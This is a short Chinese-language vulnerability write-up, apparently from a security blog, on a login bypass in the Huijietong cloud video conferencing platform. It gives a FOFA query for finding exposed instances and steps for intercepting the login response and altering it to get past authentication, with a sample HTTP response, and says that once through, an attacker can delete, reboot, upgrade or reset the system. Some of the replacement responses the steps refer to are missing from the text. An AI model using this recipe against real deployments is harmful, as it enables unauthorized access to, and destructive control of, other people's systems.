# 会捷通云视讯平台登录绕过漏洞
## 漏洞描述
**会捷通云视讯平台存在登录绕过漏洞,可以通过修改返回包进行登录**
## 漏洞影响
> 会捷通云视讯平台
## FOFA
> body=”/him/api/rest/v1.0/node/role
## 漏洞复现
**替换登录返回包内容即可绕过登录验证。**
“`
HTTP/1.1 200
Date: Thu, 25 Mar 2021 13:53:45 GMT
Accept-Ranges: bytes
Server: Restlet-Framework/2.1.1
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 28
{“token”:null,”result”:null}
“`
**1.** **拦截数据包**

**输入任意用户/密码,如admin/admin**
**2.点击登录,拦截返回包,替换为如下内容**

**正常返回包:提示密码错误:**

**替换:**

**放开拦截,可任意操作,删除,重启、升级、重置等等**

请登录后查看评论内容